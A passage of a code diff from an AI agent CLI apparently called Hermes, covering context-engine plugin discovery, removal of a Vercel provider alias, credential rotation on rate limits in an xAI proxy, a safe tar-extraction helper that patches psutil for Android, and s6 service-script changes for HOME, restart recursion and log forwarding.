+ plugin-registered engines (third-party engines installed as Hermes
+ plugins via ``ctx.register_context_engine``). Repo-shipped descriptions
+ win when a plugin-registered engine collides on name.
+ """
+ engines: list[tuple[str, str]] = []
+ seen: set[str] = set()
try:
from plugins.context_engine import discover_context_engines
- return [(name, desc) for name, desc, _avail in discover_context_engines()]
+ for name, desc, _avail in discover_context_engines():
+ if name not in seen:
+ engines.append((name, desc))
+ seen.add(name)
except Exception:
- return []
+ pass
+ try:
+ from hermes_cli.plugins import discover_plugins, get_plugin_context_engine
+ discover_plugins()
+ plugin_engine = get_plugin_context_engine()
+ if plugin_engine and getattr(plugin_engine, "name", None) and plugin_engine.name not in seen:
+ engines.append((plugin_engine.name, "installed plugin"))
+ except Exception:
+ pass
+ return engines
def _get_current_memory_provider() -> str:
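The merge behaviour of `_discover_context_engines` (first source wins on a name collision, and one failing source does not hide the others) can be sketched generically. `merge_engines` and the sample engine names are hypothetical; the real function hard-codes its two sources rather than taking callables.

```python
from typing import Callable, Iterable

EngineList = Iterable[tuple[str, str]]


def merge_engines(*sources: Callable[[], EngineList]) -> list[tuple[str, str]]:
    """Merge (name, description) pairs; earlier sources win on duplicate names."""
    engines: list[tuple[str, str]] = []
    seen: set[str] = set()
    for source in sources:
        try:
            for name, desc in source():
                if name not in seen:
                    engines.append((name, desc))
                    seen.add(name)
        except Exception:
            # A broken source is skipped; entries gathered so far are kept.
            continue
    return engines


def repo_shipped() -> EngineList:
    return [("compressor", "built-in engine")]


def broken() -> EngineList:
    raise RuntimeError("discovery failed")


def plugin_registered() -> EngineList:
    return [("compressor", "installed plugin"), ("custom", "installed plugin")]


print(merge_engines(repo_shipped, broken, plugin_registered))
```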
-9
@@ -143,10 +143,6 @@ HERMES_OVERLAYS: Dict[str, HermesOverlay] = {
transport="openai_chat",
base_url_env_var="ALIBABA_CODING_PLAN_BASE_URL",
),
- "vercel": HermesOverlay(
- transport="openai_chat",
- is_aggregator=True,
- ),
"opencode": HermesOverlay(
transport="openai_chat",
is_aggregator=True,
@@ -290,11 +286,6 @@ ALIASES: Dict[str, str] = {
"github": "github-copilot",
"github-copilot-acp": "copilot-acp",
- # vercel (models.dev ID for AI Gateway)
- "ai-gateway": "vercel",
- "aigateway": "vercel",
- "vercel-ai-gateway": "vercel",
# opencode (models.dev ID for OpenCode Zen)
"opencode-zen": "opencode",
"zen": "opencode",
+2 -2
@@ -104,7 +104,7 @@ class NousPortalAdapter(UpstreamAdapter):
state = self._read_state()
if state is None:
raise RuntimeError(
- "Not logged into Nous Portal. Run `hermes login nous` first."
+ "Not logged into Nous Portal. Run `hermes auth add nous` first."
)
try:
@@ -135,7 +135,7 @@ class NousPortalAdapter(UpstreamAdapter):
if not agent_key:
raise RuntimeError(
"Nous Portal refresh did not return a usable agent_key. "
- "Try `hermes login nous` to re-authenticate."
+ "Try `hermes auth add nous` to re-authenticate."
)
base_url = (
+13 -4
@@ -79,7 +79,7 @@ class XAIGrokAdapter(UpstreamAdapter):
failed_credential: UpstreamCredential,
status_code: int,
) -> Optional[UpstreamCredential]:
if status_code != 401:
if status_code not in {401, 429}:
return None
with self._lock:
@@ -87,16 +87,25 @@ class XAIGrokAdapter(UpstreamAdapter):
if pool is None:
return None
refreshed = pool.try_refresh_current()
if refreshed is None:
if status_code == 429:
# Mark the rate-limited key with its 1-hour cooldown and rotate
# to the next available credential. Returns None when the pool
# has no other key to offer — the 429 will flow back to the client.
refreshed = pool.mark_exhausted_and_rotate(status_code=status_code)
else:
refreshed = pool.try_refresh_current()
if refreshed is None:
refreshed = pool.mark_exhausted_and_rotate(status_code=status_code)
if refreshed is None:
return None
retry_cred = self._credential_from_entry(refreshed)
if retry_cred.bearer == failed_credential.bearer:
return None
logger.info("proxy: xAI upstream rejected bearer; retrying with refreshed pool credential")
logger.info(
"proxy: xAI upstream returned %s; retrying with rotated pool credential",
status_code,
)
return retry_cred
def _load_pool(self) -> Optional[CredentialPool]:
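The retry decision in this hunk can be sketched with a toy pool. `FakePool` and `pick_retry_key` are hypothetical; only the method names `try_refresh_current` and `mark_exhausted_and_rotate(status_code=...)` come from the diff, and their real semantics (including the cooldown mentioned in the comment) are assumed rather than reproduced. The point is the branching: a 429 rotates immediately because refreshing a rate-limited key would not help, while a 401 tries a refresh first and rotates only if that fails.

```python
from typing import Optional


class FakePool:
    """Hypothetical stand-in exposing only the two pool methods used below."""

    def __init__(self, keys: list[str], refreshable: bool) -> None:
        self.keys = list(keys)
        self.refreshable = refreshable
        self.exhausted: list[tuple[str, int]] = []

    def try_refresh_current(self) -> Optional[str]:
        return self.keys[0] + "-refreshed" if self.refreshable else None

    def mark_exhausted_and_rotate(self, *, status_code: int) -> Optional[str]:
        self.exhausted.append((self.keys.pop(0), status_code))
        return self.keys[0] if self.keys else None


def pick_retry_key(pool: FakePool, failed_key: str, status_code: int) -> Optional[str]:
    if status_code not in {401, 429}:
        return None
    if status_code == 429:
        # Rate limited: skip the refresh attempt and rotate straight away.
        candidate = pool.mark_exhausted_and_rotate(status_code=status_code)
    else:
        candidate = pool.try_refresh_current()
        if candidate is None:
            candidate = pool.mark_exhausted_and_rotate(status_code=status_code)
    # Retrying with the same credential would only repeat the failure.
    if candidate is None or candidate == failed_key:
        return None
    return candidate


print(pick_retry_key(FakePool(["a", "b"], refreshable=True), "a", 429))
print(pick_retry_key(FakePool(["a", "b"], refreshable=True), "a", 401))
```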
+1 -1
@@ -44,7 +44,7 @@ def cmd_proxy_start(args: Any) -> int:
return 2
if not adapter.is_authenticated():
- auth_hint = getattr(adapter, "auth_hint", f"hermes login {adapter.name}")
+ auth_hint = getattr(adapter, "auth_hint", f"hermes auth add {adapter.name}")
print(
f"Not logged into {adapter.display_name}. "
f"Run `{auth_hint}` first.",
+1 -1
@@ -206,7 +206,7 @@ def create_app(adapter: UpstreamAdapter) -> "web.Application":
return session_or_response
session = session_or_response
- if upstream_resp.status == 401:
+ if upstream_resp.status in {401, 429}:
try:
retry_cred = adapter.get_retry_credential(
failed_credential=cred,
+108
@@ -0,0 +1,108 @@
"""Helpers for the temporary psutil-on-Android compatibility installer."""
from __future__ import annotations
import shutil
import tarfile
from pathlib import Path, PurePosixPath
# Pin a version we know patches cleanly. Update when a newer psutil
# changes the marker line shape and we need to follow upstream.
PSUTIL_URL = (
"https://files.pythonhosted.org/packages/aa/c6/"
"d1ddf4abb55e93cebc4f2ed8b5d6dbad109ecb8d63748dd2b20ab5e57ebe/"
"psutil-7.2.2.tar.gz"
)
MARKER = 'LINUX = sys.platform.startswith("linux")'
REPLACEMENT = 'LINUX = sys.platform.startswith(("linux", "android"))'
class PsutilAndroidInstallError(RuntimeError):
"""Raised when the pinned psutil sdist is missing or unsafe."""
def _normalize_member_parts(member_name: str) -> tuple[str, ...]:
path = PurePosixPath(member_name)
parts = tuple(part for part in path.parts if part not in ("", "."))
if path.is_absolute() or ".." in parts or not parts:
raise PsutilAndroidInstallError(
f"Unsafe archive member path: {member_name!r}"
)
return parts
def _safe_extract_tar_gz(archive: Path, destination: Path) -> None:
"""Extract a tar.gz without allowing traversal or link members."""
with tarfile.open(archive, "r:gz") as tf:
for member in tf.getmembers():
parts = _normalize_member_parts(member.name)
target = destination.joinpath(*parts)
if member.isdir():
target.mkdir(parents=True, exist_ok=True)
continue
if not member.isfile():
raise PsutilAndroidInstallError(
f"Unsupported archive member type: {member.name}"
)
target.parent.mkdir(parents=True, exist_ok=True)
extracted = tf.extractfile(member)
if extracted is None:
raise PsutilAndroidInstallError(
f"Cannot read archive member: {member.name}"
)
with extracted, open(target, "wb") as dst:
shutil.copyfileobj(extracted, dst)
try:
target.chmod(member.mode & 0o777)
except OSError:
pass
def prepare_patched_psutil_sdist(archive: Path, destination: Path) -> Path:
"""Safely extract the pinned psutil sdist and patch it for Android."""
_safe_extract_tar_gz(archive, destination)
src_roots = sorted(
(
path for path in destination.iterdir()
if path.is_dir() and path.name.startswith("psutil-")
),
key=lambda path: path.name,
)
if not src_roots:
raise PsutilAndroidInstallError(
"psutil sdist did not contain a psutil-* directory"
)
src_root = src_roots[0]
common_py = src_root / "psutil" / "_common.py"
if not common_py.is_file():
raise PsutilAndroidInstallError(
f"psutil sdist did not contain {common_py.relative_to(src_root)!s}"
)
try:
content = common_py.read_text(encoding="utf-8")
except OSError as exc:
raise PsutilAndroidInstallError(
f"Failed to read {common_py.relative_to(src_root)!s}"
) from exc
if MARKER not in content:
raise PsutilAndroidInstallError(
"psutil Android compatibility patch marker not found"
)
try:
common_py.write_text(
content.replace(MARKER, REPLACEMENT),
encoding="utf-8",
)
except OSError as exc:
raise PsutilAndroidInstallError(
f"Failed to write {common_py.relative_to(src_root)!s}"
) from exc
return src_root
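The member-path check in `_normalize_member_parts` can be tried against an in-memory archive. The sketch below reuses the same `PurePosixPath` logic but raises a plain `ValueError`; `build_archive` and `unsafe_members` are hypothetical helpers added only so the example is self-contained, and it lists offending members instead of extracting anything.

```python
import io
import tarfile
from pathlib import PurePosixPath


def normalize_member_parts(member_name: str) -> tuple[str, ...]:
    path = PurePosixPath(member_name)
    parts = tuple(part for part in path.parts if part not in ("", "."))
    # Reject absolute paths, parent-directory escapes, and empty names.
    if path.is_absolute() or ".." in parts or not parts:
        raise ValueError(f"Unsafe archive member path: {member_name!r}")
    return parts


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Hypothetical helper: build a small tar.gz in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def unsafe_members(archive_bytes: bytes) -> list[str]:
    """Return member names that the extractor above would refuse."""
    bad: list[str] = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tf:
        for member in tf.getmembers():
            try:
                normalize_member_parts(member.name)
            except ValueError:
                bad.append(member.name)
                continue
            # Links, devices, and FIFOs are refused as well.
            if not (member.isdir() or member.isfile()):
                bad.append(member.name)
    return bad


archive = build_archive({
    "psutil-7.2.2/psutil/_common.py": b"LINUX = ...\n",
    "../evil.py": b"print('escaped')\n",
})
print(unsafe_members(archive))
```

Validating every name before writing, and refusing anything that is not a regular file or directory, is what lets the installer extract without relying on `tarfile`'s own extraction filters.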
+47 -3
@@ -566,8 +566,11 @@ class S6ServiceManager:
1. Sources HERMES_HOME (and any extra env) via with-contenv
so e.g. ``-e HERMES_HOME=/data/hermes`` is honored at run
time, not Python-substituted at registration time (OQ8-C).
2. Activates the bundled venv.
3. Drops to the hermes user and exec's
2. Resets ``HOME`` to ``/opt/data`` before the privilege drop
so with-contenv's root HOME does not leak into the
unprivileged gateway process.
3. Activates the bundled venv.
4. Drops to the hermes user and exec's
``hermes -p <profile> gateway run`` (or just ``hermes
gateway run`` for the default profile; see below).
@@ -597,11 +600,20 @@ class S6ServiceManager:
"#!/command/with-contenv sh",
"# shellcheck shell=sh",
"set -e",
"export HOME=/opt/data",
"cd /opt/data",
". /opt/hermes/.venv/bin/activate",
]
for k, v in sorted(extra_env.items()):
lines.append(f"export {k}={shlex.quote(v)}")
# Sentinel for the supervised-child path. Prevents recursive
# redirect when the supervised gateway re-enters
# `_gateway_command_inner` with subcmd == "run" — without it the
# supervisor would dispatch `gateway start` which would re-exec
# `gateway run --replace` which would re-dispatch `gateway
# start`, etc. See `_gateway_command_inner` for the matching
# guard.
lines.append("export HERMES_S6_SUPERVISED_CHILD=1")
if profile == "default":
lines.append("exec s6-setuidgid hermes hermes gateway run")
else:
@@ -620,6 +632,38 @@ class S6ServiceManager:
so a container started with ``-e HERMES_HOME=/data/hermes``
gets its logs under /data/hermes/logs/..., not the build-time
default.
Output routing: the script is two action directives, applied
per line, in order:
1. ``1`` (forward to stdout): propagates the line up the
s6-supervise pipeline to /init's stdout, which is the
container's stdout, which is ``docker logs``. Without
this, supervised stdout would be terminated inside
s6-log and never reach the container's log stream;
users would have to ``docker exec`` and ``tail`` the
file just to see startup banners. (Python's ``logging``
module defaults to stderr, which s6-supervise leaves
unfiltered, so warnings/errors already reach docker
logs. This change is specifically about the rich-console
banner output and other plain stdout writes.)
2. ``T <log_dir>``: also write a timestamped copy to the
rotated log directory (``current`` + archived ``@*.s``
files). This is what ``hermes logs`` reads and what
persists across container restarts via the volume mount.
``T`` is non-sticky: it only prefixes lines for the next
action directive. We deliberately put ``T`` between ``1``
and the log dir (not before ``1``) so:
* ``docker logs`` shows raw lines; Python's logging
formatter has its own timestamps, and ``docker logs
--timestamps`` adds a third layer when desired. No
double-stamping in the most common reading path.
* The persisted file gets s6-log's own ISO 8601 timestamp
so even output that lacked a Python-logger timestamp
(rich banners, third-party libs' raw prints) is
correlatable in ``current``.
"""
import shlex
prof = shlex.quote(profile)
@@ -630,7 +674,7 @@ class S6ServiceManager:
f'log_dir="$HERMES_HOME/logs/gateways/{prof}"\n'
f'mkdir -p "$log_dir"\n'
f'chown -R hermes:hermes "$log_dir" 2>/dev/null || true\n'
f'exec s6-setuidgid hermes s6-log n10 s1000000 T "$log_dir"\n'
f'exec s6-setuidgid hermes s6-log 1 n10 s1000000 T "$log_dir"\n'
)
# -- lifecycle ---------------------------------------------------------
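The directive ordering described in the docstring can be made explicit with a small builder. `s6_log_command` is a hypothetical helper, not part of `S6ServiceManager`; it only assembles the final `exec` line from the diff so the position of each directive is visible: `1` forwards the raw line to stdout, `n10` and `s1000000` set the number of archives kept and the rotation size, and `T` timestamps only what the following log-directory action writes.

```python
def s6_log_command(log_dir: str = '"$log_dir"', *, forward_stdout: bool = True) -> str:
    """Assemble the s6-log invocation used in the log run script (sketch)."""
    directives: list[str] = []
    if forward_stdout:
        # Action directive: forward the untimestamped line to stdout.
        directives.append("1")
    # Control directives for the directory action that follows:
    # keep 10 archives, rotate near 1,000,000 bytes, prefix ISO 8601 timestamps.
    directives += ["n10", "s1000000", "T", log_dir]
    return "exec s6-setuidgid hermes s6-log " + " ".join(directives)


print(s6_log_command())
print(s6_log_command(forward_stdout=False))
```

Because `T` comes after `1`, the copy that reaches `docker logs` stays unstamped while the file under the log directory gets the timestamp, which matches the reasoning in the docstring.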

Some files were not shown because too many files have changed in this diff.